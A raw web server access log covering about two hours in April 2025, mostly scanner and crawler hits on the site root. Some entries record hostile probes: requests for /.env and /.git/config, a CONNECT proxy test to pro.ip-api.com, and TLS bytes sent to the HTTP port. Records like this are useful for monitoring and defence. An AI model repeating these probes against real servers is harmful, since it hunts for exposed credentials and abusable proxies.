104.234.115.86 - - [21/Apr/2025:23:31:53 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
205.210.31.51 - - [21/Apr/2025:23:33:16 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
94.181.149.142 - - [21/Apr/2025:23:33:58 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
154.81.156.54 - - [21/Apr/2025:23:36:02 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
5.183.209.244 - - [21/Apr/2025:23:42:26 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
185.242.226.116 - - [21/Apr/2025:23:47:45 +0200] "\x16\x03\x01" 400 383 "-" "-"
24.243.39.93 - - [21/Apr/2025:23:48:35 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
154.81.156.54 - - [22/Apr/2025:00:06:04 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [22/Apr/2025:00:17:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [22/Apr/2025:00:21:22 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.82.77.202 - - [22/Apr/2025:00:33:37 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
80.75.212.115 - - [22/Apr/2025:00:34:13 +0200] "CONNECT pro.ip-api.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
154.81.156.54 - - [22/Apr/2025:00:39:25 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [22/Apr/2025:00:42:50 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
154.81.156.54 - - [22/Apr/2025:00:58:47 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
139.59.44.211 - - [22/Apr/2025:01:06:36 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
139.59.44.211 - - [22/Apr/2025:01:06:36 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
185.191.127.222 - - [22/Apr/2025:01:18:34 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
154.81.156.54 - - [22/Apr/2025:01:26:06 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [22/Apr/2025:01:37:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"